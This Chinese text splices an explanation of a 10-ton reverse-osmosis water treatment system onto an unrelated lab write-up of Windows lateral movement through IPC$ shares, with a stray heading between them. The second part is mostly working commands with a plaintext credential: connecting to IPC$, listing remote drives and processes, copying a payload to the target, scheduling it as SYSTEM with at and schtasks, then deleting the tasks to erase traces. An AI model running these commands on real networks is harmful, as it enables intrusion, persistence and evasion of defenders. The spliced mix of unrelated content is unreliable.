0噸級別的反滲透(RO)水處理設備作為技術顧問,我有責任為客戶提供詳實而精確的方案解析,尤其是在涉及到10噸級別的反滲透(RO)水處理設備時。此類設備的核心工藝流程主要通過物理屏障來去除水中的溶解固體、有機物、細菌、病毒等懸浮物質。
首要步驟是預處理系統,這通常包括多介質過濾器、活性炭過濾器和阻垢劑的加注系統。多介質過濾器通過不同粒徑的濾料層,有效去除水中的懸浮物和顆粒物,而活性炭過濾則能去除部分有機污染物和余氯,從而保護后續RO膜免于氯的侵害。阻垢劑的加注則用于預防潛在的水垢問題,延長 RO膜的使用壽命。
經過預處理后,水進入高壓泵,由此提升壓力,保證足夠的流速通過RO膜。RO膜是系統的核心,其半透膜只允許水分子通過,而大分子和離子如硬度、重金屬和鹽分則被截留,確保出水的純凈度符合要求。
最后,為了確保水質,系統還會裝備有在線監測儀器與二次安全過濾,持續監控處理水的質量,通過微孔過濾確保出水穩定且安全。
整個RO工藝流程不僅對于原水的凈化至關重要,更因其運行成本和維護的簡便性,成為了工業純水供應中的可靠選擇。在設計10噸RO系統時,科學的管路布局、高效的自動化控制及精細化的過程管理是保障設備長效運行和高質量出水的關鍵因素。
最近研究了一下ATT&CK的內網橫向滲透,黑客很多時候能拿到一個站點的控制權限,但是距離最終的目標還有一定距離,所以就有了「橫向滲透」這個關鍵詞。說白了就是利用跳板機,感染內網其他主機,逐漸接近最終目標。在高級持續性威脅(APT)中尤為常見,被安全分析師津津樂道。本次實驗呢,就是通過建立IPC來控制其他主機搞事情~
【軟件安全】緩沖區溢出攻防 作者 ailx10
為了實現進程間通信而開放的命名管道,IPC可以通過驗證用戶名和密碼,獲得相應的權限。通常在管理遠程計算機和查看計算機的共享資源時使用。
通過ipc$可以和目標機器建立連接,利用這個連接,不僅可以訪問目標機器的文件,進行上傳、下載,還可以在目標機器上運行其他命名。
ailx10
net use \192.168.160.135\ipc$ "W2ngluoanquan" /user:HACKBIJI\Administrator
使用windows自帶的工具獲取遠程主機信息
查看遠程主機的C盤文件
dir \192.168.160.135\C$
去 192.168.160.135 主機上查看一下C盤,一摸一樣。
查看遠程主機上運行的進程
tasklist /S 192.168.160.135 /U HACKBIJI\Administrator /P W2ngluoanquan
at是windows自帶的用于創建計劃任務的命令,使用at命令可以在遠程目標上創建計劃任務,建立定時任務四部曲如下:
步驟一:使用net time 命令確定遠程機器當前的系統時間
net time \192.168.160.135
步驟二:使用copy命令將payload文件復制到遠程目標機器中
copy calc.bat \192.168.160.135\c$
步驟三:使用at命令定時啟動該payload文件
在下午5點49分啟動calc.bat批批處理任務
at \192.168.160.135 17:49:00 c:\calc.bat
到點后,查看到出現了calc.exe進程,成功植入了定時任務,卡的要死。一定要控制好執行頻率,否則肯定會被抓的。
步驟四:刪除使用at命令創建計劃任務的記錄
黑客完成目的之后要清楚痕跡,所以要刪除計劃任務。
at \192.168.160.135 2 /delete
schtasks命令比at命令更加強大、靈活。創建計劃任務,該計劃任務在開機時啟動,運行c盤下的calc.bat批處理任務,運行權限是system。
schtasks /create /s 192.168.160.135 /tn ailx10_task /sc onstart /tr c:\calc.bat /ru system /f /u HACKBIJI\Administrator /p W2ngluoanquan
嘗試立即運行這個計劃任務,然后再次查看發現新增了一個calc.exe進程
schtasks /run /s 192.168.160.135 /i /tn "ailx10_task" /u HACKBIJI\Administrator /p W2ngluoanquan
最后刪除計劃任務
schtasks /delete /s 192.168.160.135 /tn "ailx10_task" /f /U HACKBIJI\Administrator /P W2ngluoanquan
最后的最后,刪除$ipc,結束戰斗~
net use \192.168.160.135\ipc$ /del /y
本篇完~